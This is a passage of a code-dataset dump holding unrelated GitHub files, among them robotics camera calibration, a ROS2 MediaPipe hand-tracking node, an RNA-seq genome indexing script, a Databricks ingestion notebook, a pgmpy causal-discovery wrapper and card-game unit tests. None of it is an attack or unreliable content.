frameTransformer\n\n# The world-to-robot transformation\nfrom Surveillance.utils.transform_mats import M_WtoR\nfrom coordTransform_colors import *\n\n# The D435 starter\nd435_configs = d435.D435_Configs(\n W_dep=848,\n H_dep=480,\n W_color=1920,\n H_color=1080\n)\n\nd435_starter = d435.D435_Runner(d435_configs)\n\n# The aruco calibrator\ncalibrator_CtoW = CtoW_Calibrator_aruco(\n d435_starter.intrinsic_mat,\n distCoeffs=np.array([0.0, 0.0, 0.0, 0.0, 0.0]),\n markerLength_CL = 0.078,\n maxFrames = 30,\n flag_vis_extrinsic = True,\n flag_print_MCL = False,\n stabilize_version =False \n)\n\n# the frame Transformer\nframe_transformer = frameTransformer(\n M_intrinsic=d435_starter.intrinsic_mat,\n M_WtoC=None,\n M_WtoR=M_WtoR,\n)\n\n# sample some target points from the robot frame\ntarget_points_R = np.array([\n [0.2, -0.15, 0],\n [0.2, 0, 0],\n [0.2, 0.15, 0],\n [0.3, -0.15, 0],\n [0.3, 0, 0],\n [0.3, 0.15, 0],\n])\n\n\nplt.figure(1)\nplt.show(block=False)\nplt.ion()\ncali_finish = False\nwhile(not cali_finish):\n # get frames\n rgb, dep, success = d435_starter.get_frames()\n if not success:\n print(\"Cannot get the camera signals. 
Exiting...\")\n exit()\n\n # calibrate\n M_CL, corners_aruco, img_with_ext, status = calibrator_CtoW.process(rgb, dep) \n\n # update M_CtoW\n frame_transformer.M_WtoC = M_CL\n\n # update the flag\n cali_finish = calibrator_CtoW.stable_status\n\n # visualize calibration\n display.display_images_cv([img_with_ext[:,:,::-1]], ratio=0.5, \\\n window_name=\"The extrinsic calibration(right, Press \\'q\\' to exit\") \n\n \n opKey = cv2.waitKey(1)\n if opKey == ord('q'):\n break\n\n\n # transform the target points and visualize them\n p_W, p_C, p_Img = frame_transformer.parsePRob(target_points_R)\n print(\"The world frame coordinate: {}\".format(p_W))\n print(\"The camera frame coordinate: {}\".format(p_C))\n print(\"The image frame coordinate: {}\".format(p_Img))\n\n # plot the target points\n rgb = np.ascontiguousarray(rgb, dtype=np.uint8)\n for tP in p_Img.astype(int):\n rgb = cv2.circle(rgb, (tP[0], tP[1]), radius=5, color=color_imgF_orig, thickness=-1)\n display.display_images_cv([rgb[:,:,::-1]], ratio=0.5, \\\n window_name=\"The projection of the target position Press \\'q\\' to exit\") \n\n\n\ncv2.destroyAllWindows()\nprint(\"Calibration complete\")\n\n# parse the target points\np_W, p_C, p_Img = frame_transformer.parsePRob(target_points_R)\nprint(\"The world frame coordinate: {}\".format(p_W))\nprint(\"The camera frame coordinate: {}\".format(p_C))\nprint(\"The image frame coordinate: {}\".format(p_Img))\n\nwhile(True):\n\n # get frames\n rgb, dep, success = d435_starter.get_frames()\n\n #pC_map, pW_map, pR_map = frame_transformer.parseDepth(dep)\n #plt.figure(1)\n #plt.imshow(pW_map[:,:,-1])\n #plt.draw()\n #plt.pause(1)\n\n # plot the target points\n rgb = np.ascontiguousarray(rgb, dtype=np.uint8)\n for tP in p_Img.astype(int):\n rgb = cv2.circle(rgb, (tP[0], tP[1]), radius=5, color=color_imgF_orig, thickness=-1)\n display.display_images_cv([rgb[:,:,::-1]], ratio=0.5, \\\n window_name=\"The projection of the target position Press \\'q\\' to exit\") \n\n opKey = cv2.waitKey(1)\n if opKey == ord('q'):\n break\n","repo_name":"ivapylibs/Surveillance","sub_path":"testing/coordTransform_PRob.py","file_name":"coordTransform_PRob.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38837307668","text":"#! 
/usr/bin/env python\n\nimport rosbag\n\nif __name__ == '__main__':\n bag = rosbag.Bag('hw4_.bag')\n \n x_a = [msg.pose.pose.position.x for (topic, msg, t) in bag.read_messages(topics=['/robot0/odom'])]\n y_a = [msg.pose.pose.position.y for (topic, msg, t) in bag.read_messages(topics=['/robot0/odom'])]\n t_t = [t.to_sec() for (topic, msg,t) in bag.read_messages(topics = ['/robot0/odom'])]\n prijeden_put = 0\n x_minus = x_a[0]\n y_minus = y_a[0]\n\n for (x_in, y_in) in zip(x_a, y_a):\n prijeden_put += ((x_in-x_minus)**2 + (y_in-y_minus)**2)**0.5\n x_minus = x_in\n y_minus = y_in\n\n\n srednja_brzina = (float)(prijeden_put)/(t_t[len(t_t)-1]-t_t[0])\n","repo_name":"br5555/ROS_Homeworks","sub_path":"dz4/catkin_ws/src/zadaca3/scripts/hw4_bag.py","file_name":"hw4_bag.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10788973394","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport os\nimport sys\nimport argparse\nimport re\nimport time\nimport datetime\nimport pandas as pd\n\ndef current_time():\n\treturn datetime.datetime.now().strftime('%b-%d-%Y %H:%M:%S')\n\n\ndef STAR_index(threads, genome, gtf, sjdbOverhang):\n\tos.system(\"STAR --runMode genomeGenerate --runThreadN %d --genomeFastaFiles %s --sjdbGTFfile %s --sjdbOverhang %d --genomeDir .\" %(threads, genome, gtf, sjdbOverhang))\n\n\ndef hisat2_index(threads, genome, gtf):\n\tos.system(\"hisat2_extract_splice_sites.py %s > genome.ss\" % gtf)\n\tos.system(\"hisat2_extract_exons.py %s > genome.exon\" % gtf)\n\tos.system(\"hisat2-build -p %d %s --ss genome.ss --exon genome.exon genome_tran\" % (threads, genome))\n\n\ndef GTF(gtf):\n\td_name = {}\n\td_id = {}\n\n\tsList = []\n\twith open(gtf) as f:\n\t\tfor line in f:\n\t\t\tif not line.startswith('#'):\n\t\t\t\t(chrid, source, genetype, start, end, score, strand, phase, attribute_string) = line.rstrip().split('\\t')\n\t\t\t\tattributes = {}\n\t\n\t\t\t\tif genetype=='gene':\n\t\t\t\t\tkey_value_pair_set = attribute_string.split('; ')\n\t\t\t\t\tfor key_value_pair in key_value_pair_set[: -1]:\n\t\t\t\t\t key, value = key_value_pair.split(' ')\n\t\t\t\t\t attributes[key] = value[1: -1] ### remove the first str and last str\n\t\t\t\t\t### specially for last field\n\t\t\t\t\tkey, value = key_value_pair_set[-1][: -1].split(' ')\n\t\t\t\t\tattributes[key] = value[1: -1]\n\t\t\t\t\t\n\t\t\t\t\tgene_id = attributes.get('gene_id')\n\t\t\t\t\tgene_name = attributes.get('gene_name')\n\t\t\t\t\tgene_type = attributes.get('gene_biotype')\n\t\n\t\t\t\t\t#print(gene_id, gene_name, gene_type)\n\t\t\t\t\td_name[gene_name] = gene_type\n\t\t\t\t\td_id[gene_id] = gene_type\n\n\t\t\t\t\tsList.append([gene_id, gene_name, gene_type])\n\t'''\n\tdf_name =pd.Series(d_name)\n\tdf_name_csv = \"gene_name.type.txt\"\n\tdf_name.to_csv(df_name_csv, header=False, sep='\\t')\n\n\tdf_id=pd.Series(d_id)\n\tdf_id_csv = \"gene_id.type.txt\"\n\tdf_id.to_csv(df_id_csv, header=False, sep='\\t')\n\t'''\n\tdf = pd.DataFrame(sList)\n\tdf_csv = \"gene_type.txt\"\n\tdf.to_csv(df_csv, header=False, index=True, sep='\\t')\n\n\n\ndef main(mapper, threads, genome, gtf, sjdbOverhang):\n\tif mapper == 'STAR':\n\t\tSTAR_index(threads, genome, gtf, sjdbOverhang)\n\telif mapper == 'hisat2':\n\t\thisat2_index(threads, genome, gtf)\n\tos.system(\"cp %s annotation.gtf\" % gtf)\n\n\nif __name__ == '__main__':\n\t\n\tparser = argparse.ArgumentParser(description='build genome index')\n\n\tparser.add_argument('-mapper', choices=['hisat2', 
'STAR'], type=str, help='choose the mapping program')\n\tparser.add_argument('-genome', type=str, help='reference genome sequences')\n\tparser.add_argument('-gtf', type=str, help='annotation GTF file')\n\tparser.add_argument('-threads', default=5, type=int, help='number of threads (CPUs) to use (default: 5)')\n\tparser.add_argument('-sjdbOverhang', default=149, type=int, help='max(ReadLength)-1, the default value of 149 will work for Illumina 2x150b paired-end reads')\n\t\n\targs = parser.parse_args()\n\t\n\tprint(\"\\n%s ..... Start RNAseq processing\" % (current_time()))\n\tstart_time = time.time()\n\n\tmain(args.mapper, args.threads, args.genome, args.gtf, args.sjdbOverhang)\n\tGTF(args.gtf)\n\t\n\tend_time = time.time()\n\trun_time = round((end_time - start_time)/60, 5)\n\tprint(\"\\n%s ..... Finished all. Used time: %s m\\n\" % (current_time(), run_time))\n\n\n\n\n\n\n","repo_name":"liuwell/rapvis","sub_path":"rapvis/rapvis_build.py","file_name":"rapvis_build.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28555839663","text":"# Stwórz moduł, który zajmuje się jedynie otwieraniem plików - oferuje bezpieczny sposób odczytu oraz bezpieczny zapis.\n# Funkcja czytająca pliki sprawdza najpierw czy dany plik istnieje oraz czy jest niepusty.\n# Funkcja zapisująca do pliku chroni przed nadpisaniem istniejącego pliku.\n\nimport module_file as mf\n\ndef menu():\n x = input('1 - read from file\\n2 - save to file\\n')\n\n if x == '1':\n filename = input('File name or path to read:')\n content = mf.read_from_file(filename)\n print(content)\n elif x == '2':\n save_file = input('File name or path to save:')\n content = input('Write your content here: ')\n mf.save_to_file(save_file, content)\n print('Saved!')\n else:\n print(\"Wrong input\")\n\n\ndef main():\n menu()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ritaly/kurs_python","sub_path":"09_moduly/zad3/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11800878765","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ###Ingest Constructors.JSON file###\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_data_source\", \"\")\nv_data_source = dbutils.widgets.get(\"p_data_source\")\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\", \"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../Includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../Includes/common_functions\"\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import col\nfrom pyspark.sql.functions import current_timestamp\nfrom pyspark.sql.functions import lit\n\n# COMMAND ----------\n\nconstructor = spark.read.json(f\"{raw_folder_path}/{v_file_date}/constructors.json\", schema = \"constructorId INT, constructorRef STRING, name STRING, nationality STRING, url STRING\")\n\n# COMMAND ----------\n\ndisplay(constructor)\n\n# COMMAND ----------\n\nconstructor_new = constructor.drop(col('url'))\n\n# COMMAND ----------\n\nconstructor_final = constructor_new.withColumnRenamed(\"constructorId\", \"constructor_id\").withColumnRenamed(\"constructorRef\", \"constructor_ref\").withColumn(\"data_source\", lit(v_data_source)).withColumn(\"file_date\", lit(v_file_date))\n\n# COMMAND ----------\n\nconstructor_final = add_ingestion_date(constructor_final)\n\n# 
COMMAND ----------\n\ndisplay(constructor_final)\n\n# COMMAND ----------\n\nconstructor_final.write.mode(\"overwrite\").parquet(f\"{processed_folder_path}/constructors\")\n\n# COMMAND ----------\n\nconstructor_final.write.mode(\"overwrite\").format(\"parquet\").saveAsTable(\"f1_processed_new.constructors\")\n\n# COMMAND ----------\n\nconstructor_final.write.mode(\"overwrite\").format(\"delta\").saveAsTable(\"f1_processed_dl.constructors\")\n\n# COMMAND ----------\n\ndbutils.notebook.exit(\"Success\")\n","repo_name":"shreyas768/Formula1_Azure_Databricks","sub_path":"Ingestion/C.ingest_constructors_JSON_file.py","file_name":"C.ingest_constructors_JSON_file.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15992934503","text":"import rclpy\nfrom rclpy.node import Node\nfrom rclpy.duration import Duration\n\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\n\nfrom ros2_mediapipe_msgs.msg import MediapipePose\nfrom ros2_mediapipe_msgs.msg import MediapipeHands\n\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\n\nfrom geometry_msgs.msg import Point \n\n\nimport cv2\nimport mediapipe as mp\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\n\nclass MediapipeHandsROS2(Node):\n \n \n def __init__(self):\n super().__init__('ros2_mediapipe_hands')\n \n self.bridge = []\n self.bridge = CvBridge()\n \n #publisher\n self.publisher_2D_ = self.create_publisher(MediapipeHands, 'ros2_mediapipe/mediapipe_hands/normalized_image_2D', 10)\n self.publisher_3D_ = self.create_publisher(MediapipeHands, 'ros2_mediapipe/mediapipe_hands/points_3D_coordinates', 10)\n self.publisher_pixel_ = self.create_publisher(MediapipeHands, 'ros2_mediapipe/mediapipe_hands/pixel', 10)\n self.publisher_image_ = self.create_publisher(Image, 'ros2_mediapipe/mediapipe_hands/image', 10)\n \n self.publisher_marker_ = self.create_publisher(MarkerArray,'ros2_mediapipe/mediapipe_hands/normalized_image_2D_MarkerArray',10)\n self.publisher_marker_ = self.create_publisher(MarkerArray,'ros2_mediapipe/mediapipe_hands/normalized_image_2D_MarkerArray',10)\n \n self.publisher_marker_ = self.create_publisher(MarkerArray,'ros2_mediapipe/mediapipe_hands/normalized_image_2D_MarkerArray',10)\n self.publisher_marker_3D_ = self.create_publisher(MarkerArray,'ros2_mediapipe/mediapipe_hands/points_3D_coordinates_world_MarkerArray',10)\n \n \n #Subscription\n self.subscription = self.create_subscription(\n Image,\n 'ros2_mediapipe/input/image_raw',\n self.listener_callback,\n 0)\n self.subscription # prevent unused variable warning\n \n\n def listener_callback(self, msg):\n image = self.bridge.imgmsg_to_cv2(msg, desired_encoding='rgb8')\n self.apply_mediapipe(image)\n\n \n def apply_mediapipe(self, image):\n with mp_hands.Hands(\n model_complexity=0,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5) as hands:\n # pass by reference.\n image.flags.writeable = False\n results = hands.process(image)\n \n self.publish_results(results, image)\n\n \n \n def publish_results(self, results, image): \n \n MediapipeHands_2D = MediapipeHands() \n left_hand_points_2D = []\n right_hand_points_2D = []\n \n MediapipeHands_3D = MediapipeHands() \n left_hand_points_3D = []\n right_hand_points_3D = []\n \n MediapipeHands_pixel = MediapipeHands() \n left_hand_points_pixel = []\n right_hand_points_pixel 
= []\n \n height = image.shape[1]\n width = image.shape[0]\n \n \n \n if results.multi_handedness != None: \n cont_for = 0\n for i in range(0,len(results.multi_handedness)):\n cont = 0\n hand_points =[]\n hand_points_3D =[]\n hand_points_pixel = []\n for j in range(0,len(results.multi_hand_landmarks[i].landmark)):\n mp = MediapipePose()\n mp.id = j\n mp.x = results.multi_hand_landmarks[i].landmark[j].x\n mp.y = results.multi_hand_landmarks[i].landmark[j].y\n mp.z = results.multi_hand_landmarks[i].landmark[j].z\n hand_points.append(mp)\n \n \n mp3D = MediapipePose()\n mp3D.id = j\n mp3D.x = results.multi_hand_world_landmarks[i].landmark[cont].x\n mp3D.y = results.multi_hand_world_landmarks[i].landmark[cont].y\n mp3D.z = results.multi_hand_world_landmarks[i].landmark[cont].z\n hand_points_3D.append(mp3D)\n \n mpPixel = []\n mpPixel = MediapipePose()\n mpPixel.id = j\n mpPixel.x = results.multi_hand_landmarks[i].landmark[j].x*height\n mpPixel.y = results.multi_hand_landmarks[i].landmark[j].y*width\n mpPixel.z = 0.0\n hand_points_pixel.append(mpPixel)\n \n cont += 1 \n \n \n if results.multi_handedness[i].classification[0].label == \"Left\":\n left_hand_points_2D = []\n left_hand_points_2D = hand_points\n left_hand_points_3D = []\n left_hand_points_3D = hand_points_3D\n left_hand_points_pixel = []\n left_hand_points_pixel = hand_points_pixel\n elif results.multi_handedness[i].classification[0].label == \"Right\":\n right_hand_points_2D = []\n right_hand_points_2D = hand_points\n right_hand_points_3D = []\n right_hand_points_3D = hand_points_3D\n right_hand_points_pixel = []\n right_hand_points_pixel = hand_points_pixel\n \n \n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(\n image,\n hand_landmarks,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style()) \n \n\n for i in (right_hand_points_pixel):\n cv2.putText(image,str(i.id),(int(i.x),int(i.y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,100,200), 2)\n \n for i in (left_hand_points_pixel):\n cv2.putText(image,str(i.id),(int(i.x),int(i.y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,100,200), 2) \n\n \n MediapipeHands_2D.left_hand_landmarks = left_hand_points_2D \n MediapipeHands_2D.right_hand_landmarks = right_hand_points_2D\n self.publisher_2D_.publish(MediapipeHands_2D) \n \n \n #Plotting in 3D in rviz, using markers\n self.rviz_3d_hand(left_hand_points_2D, right_hand_points_2D, self.publisher_marker_, 0.05)\n self.rviz_3d_hand(left_hand_points_3D, right_hand_points_3D, self.publisher_marker_3D_, 0.01)\n \n \n MediapipeHands_3D.left_hand_landmarks = left_hand_points_3D \n MediapipeHands_3D.right_hand_landmarks = right_hand_points_3D\n self.publisher_3D_.publish(MediapipeHands_3D) \n \n MediapipeHands_pixel.left_hand_landmarks = left_hand_points_pixel \n MediapipeHands_pixel.right_hand_landmarks = right_hand_points_pixel\n self.publisher_pixel_.publish(MediapipeHands_pixel) \n \n self.publisher_image_.publish(self.bridge.cv2_to_imgmsg(image, \"bgr8\"))\n \n \n \n\n def rviz_3d_hand(self, left_hand_points, right_hand_points, pub, factor):\n markerArray = MarkerArray()\n \n \n if (left_hand_points!= []):\n for i in range(0,len(left_hand_points)):\n marker = Marker()\n marker.lifetime = \tDuration(seconds=1).to_msg()\n marker.header.frame_id = \"/ros2_mediapipe\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n 
marker.scale.x = factor\n marker.scale.y = factor\n marker.scale.z = factor\n marker.color.a = 1.0\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.pose.orientation.w = 1.0\n marker.pose.position.x = left_hand_points[i].x\n marker.pose.position.y = left_hand_points[i].y\n marker.pose.position.z = left_hand_points[i].z\n \n markerArray.markers.append(marker)\n \n \n marker_links = self.add_links_markers(left_hand_points,(factor/2))\n markerArray.markers.append(marker_links)\n \n if (right_hand_points!= []): \n for i in range(0,len(right_hand_points)):\n marker = Marker()\n marker.lifetime = \tDuration(seconds=1).to_msg()\n marker.header.frame_id = \"/ros2_mediapipe\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.scale.x = factor\n marker.scale.y = factor\n marker.scale.z = factor\n marker.color.a = 1.0\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.pose.orientation.w = 1.0\n marker.pose.position.x = right_hand_points[i].x\n marker.pose.position.y = right_hand_points[i].y\n marker.pose.position.z = right_hand_points[i].z\n \n markerArray.markers.append(marker) \n \n marker_links = self.add_links_markers(right_hand_points,(factor/2))\n markerArray.markers.append(marker_links)\n \n \n id = 0\n for m in markerArray.markers:\n m.id = id\n id += 1\n \n \n pub.publish(markerArray)\n \n def add_links_markers(self,points, factor):\n \n marker = Marker()\n marker.lifetime = \tDuration(seconds=1).to_msg()\n marker.header.frame_id = \"/ros2_mediapipe\"\n marker.type = 5\n marker.action = marker.ADD\n marker.scale.x = factor\n marker.scale.y = factor\n marker.scale.z = factor\n marker.color.a = 1.0\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.pose.orientation.w = 1.0\n \n for i in range(0,4):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p) \n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n for i in range(5,8):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n \n for i in range(9,12):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n for i in range(13,16):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n for i in range(17,20):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n position = [0,5,9,13,17,0] \n for i in range(0,len(position)-1):\n p = Point()\n p.x = points[position[i]].x;\n p.y = points[position[i]].y;\n p.z = points[position[i]].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[position[i+1]].x;\n p.y = points[position[i+1]].y;\n p.z = points[position[i+1]].z;\n marker.points.append(p) \n \n return marker \n \n \n \n \ndef main(args=None):\n rclpy.init(args=args)\n mediapipe_hands = MediapipeHandsROS2()\n rclpy.spin(mediapipe_hands)\n minimal_subscriber.destroy_node()\n 
rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"marco-teixeira/ros2_humble_mediapipe","sub_path":"ros2_mediapipe/ros2_mediapipe/mediapipe_hands.py","file_name":"mediapipe_hands.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6382662014","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 26 19:01:03 2017\n\n@author: scott\n\"\"\"\nimport allel\nfrom amask import access_mask\n\n\ndef roh(subpops, chrpos, chrdict, nchr, chrmaskdict):\n \"\"\"Runs of Homozygosity for each individual sample\n phet_roh: prob of obs a het within a RoH ~mutation rate\n phet_nonroh: >1 prob of obs het outside of RoH, ~nucleotide div\n \"\"\"\n m = access_mask(chrmaskdict, nchr)\n for pop in subpops: # Haiti\n for indx in pop: # 1, 2, 3, 4, ... 8\n gn = chrdict[nchr].genotypes[:, indx]\n het_mask = gn.is_het()\n gt = gn.compress(het_mask)\n call_mask = gn.is_called() # all sites called\n posmask = call_mask * het_mask\n pos = chrdict[nchr].positions[posmask]\n df, prop = allel.stats.roh.roh_mhmm(gt, pos, phet_roh=0.001,\n phet_nonroh=(0.0025, 0.01),\n is_accessible=m)\n return(None)\n","repo_name":"stsmall/allel_scripts","sub_path":"fxs/aroh.py","file_name":"aroh.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"19031426774","text":"\nimport os\nimport signal\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport mido\n\n\n\f\n## INIT - MIDI\n\nmido.set_backend('mido.backends.pygame')\n\ninport = mido.open_input('MidiSport 1x1 MIDI 1')\n\ndef cleanup_mido():\n inport.close()\n\ndef handler(signum, frame):\n cleanup_mido()\n\nsignal.signal(signal.SIGHUP, handler)\n\n\n\f\n## MAIN\n\ntry:\n for msg in inport:\n print(\"-----------------\")\n print(msg)\n print(msg.hex())\nexcept KeyboardInterrupt as e:\n cleanup_mido()\n","repo_name":"p3r7/lexicon-mpx1-sysex-tests","sub_path":"tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41154029646","text":"class Solution:\n def findLeastNumOfUniqueInts(self, arr: List[int], k: int) -> int:\n hmap = {}\n for i in arr:\n hmap[i] = hmap.get(i, 0) + 1\n \n hmap = dict(sorted(hmap.items(), key = lambda x: x[1]))\n zero_count = 0\n \n for key, value in hmap.items():\n if value <= k:\n k -= hmap[key]\n zero_count += 1\n print(hmap, zero_count)\n return len(hmap) - zero_count\n \n ","repo_name":"tejeshreddy/competitive-programming","sub_path":"1481-least-number-of-unique-integers-after-k-removals/1481-least-number-of-unique-integers-after-k-removals.py","file_name":"1481-least-number-of-unique-integers-after-k-removals.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70785391625","text":"class DataModel:\n '''\n Contains lists about description of problem\n '''\n def __init__(self, quantityOfPoint, weightCluster, \n weightOfPoints, weightOfVehicle, typeOfPoint,\n depot):\n self.depot = depot - 1\n self.typeOfPoint = typeOfPoint \n self.quantityOfPoint = quantityOfPoint\n self.weightCluster = weightCluster\n self.weightOfPoints = weightOfPoints\n self.weightOfVehicle = 
weightOfVehicle\n","repo_name":"flower-blossom/p-median","sub_path":"utils/DataModel.py","file_name":"DataModel.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73839486984","text":"\"\"\"\nA proxy to pgmpy structure estimators\nsee: https://github.com/pgmpy/pgmpy\n\"\"\"\nimport inspect\n\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nfrom pgmpy import estimators as A\n\nfrom ylearn.utils import set_random_state, logging\nfrom ._base import BaseDiscovery\n\nlogger = logging.get_logger(__name__)\n\n_default_options = dict(\n PC=dict(variant=\"stable\",\n ci_test=\"pearsonr\", # default continuous datasets.\n show_progress=False),\n)\n\n\nclass PgmProxy(BaseDiscovery):\n def __init__(self, learner='PC', random_state=None, **kwargs):\n assert isinstance(learner, str) and hasattr(A, learner), \\\n f'Not found learner \"{learner}\" from pgmpy.estimators'\n c = getattr(A, learner)\n assert issubclass(c, A.StructureEstimator)\n\n self.learner = learner\n self.options = kwargs.copy()\n self.random_state = random_state\n\n def _create_learner(self, data, options):\n c = getattr(A, self.learner) if self.learner is not None else A.PC\n\n kwargs = {}\n for k in inspect.signature(c.__init__).parameters.keys():\n if k in options.keys():\n kwargs[k] = options.pop(k)\n return c(data, **kwargs)\n\n def __call__(self, data, *, return_dict=False, threshold=None, **kwargs):\n assert isinstance(data, (np.ndarray, pd.DataFrame))\n\n set_random_state(self.random_state)\n\n if isinstance(data, pd.DataFrame):\n df = data\n else:\n df = pd.DataFrame(data)\n\n options = _default_options.get(self.learner, {}).copy()\n options.update(**self.options)\n learner = self._create_learner(df, options)\n\n logger.info(f'discovery causation with {type(learner).__name__}')\n if isinstance(learner, A.PC):\n options['return_type'] = 'dag'\n dag = learner.estimate(**options)\n\n columns = df.columns.tolist()\n nodes = list(dag.nodes)\n assert set(nodes).issubset(set(columns))\n\n matrix_learned = pd.DataFrame(nx.to_numpy_array(dag, nodelist=nodes, weight=None),\n columns=nodes, index=nodes)\n matrix_full = pd.DataFrame(np.zeros((df.shape[1], df.shape[1])),\n columns=columns, index=columns)\n matrix_full = (matrix_full + matrix_learned).fillna(0.0)\n\n if isinstance(data, pd.DataFrame):\n matrix = matrix_full\n else:\n matrix = matrix_full.values\n\n if return_dict:\n result = self.matrix2dict(matrix)\n else:\n result = matrix\n\n return result\n","repo_name":"DataCanvasIO/YLearn","sub_path":"ylearn/causal_discovery/_proxy_pgm.py","file_name":"_proxy_pgm.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"81"} +{"seq_id":"73186471306","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 21 11:23:53 2022\n\n@author: je_su\n\"\"\"\n\n\nfrom modulos.juego_guerra import JuegoGuerra\nimport unittest\n\n\nclass TestJuegoGuerra(unittest.TestCase):\n \n def test_resulta_gana_jugador1(self):\n \"\"\"\n Compruebo el número de turnos de 3 partidas con\n el jugador 1 como ganador\n \"\"\"\n\n # jugador 1 gana la partida en el turno 137\n self.juego_1 = JuegoGuerra(random_seed=314)\n # jugador 1 gana la partida en el turno 638\n self.juego_2 = JuegoGuerra(random_seed=59)\n # jugador 1 gana la partida en el turno 1383\n self.juego_3 = JuegoGuerra(random_seed=883)\n\n self.juego_1.iniciar_juego()\n self.juego_2.iniciar_juego()\n 
self.juego_3.iniciar_juego()\n \n self.assertEqual(self.juego_1.turnos_jugados, 137)\n self.assertEqual(self.juego_1.ganador, 'jugador 1')\n \n self.assertEqual(self.juego_2.turnos_jugados, 638)\n self.assertEqual(self.juego_2.ganador, 'jugador 1')\n \n self.assertEqual(self.juego_3.turnos_jugados, 1383)\n self.assertEqual(self.juego_3.ganador, 'jugador 1')\n \n \n def test_resulta_gana_jugador2(self):\n \"\"\"\n compruebo el número de turnos de 3 partidas con\n el jugador 2 como ganador\n \"\"\"\n\n # jugador 2 gana la partida en el turno 145\n self.juego_4 = JuegoGuerra(random_seed=167)\n # jugador 2 gana la partida en el turno 1112\n self.juego_5 = JuegoGuerra(random_seed=190)\n # jugador 2 gana la partida en el turno 1373 por Guerra\n self.juego_6 = JuegoGuerra(random_seed=735)\n\n self.juego_4.iniciar_juego()\n self.juego_5.iniciar_juego()\n self.juego_6.iniciar_juego()\n \n self.assertEqual(self.juego_4.turnos_jugados, 145)\n self.assertEqual(self.juego_4.ganador, 'jugador 2')\n \n self.assertEqual(self.juego_5.turnos_jugados, 1112)\n self.assertEqual(self.juego_5.ganador, 'jugador 2')\n \n 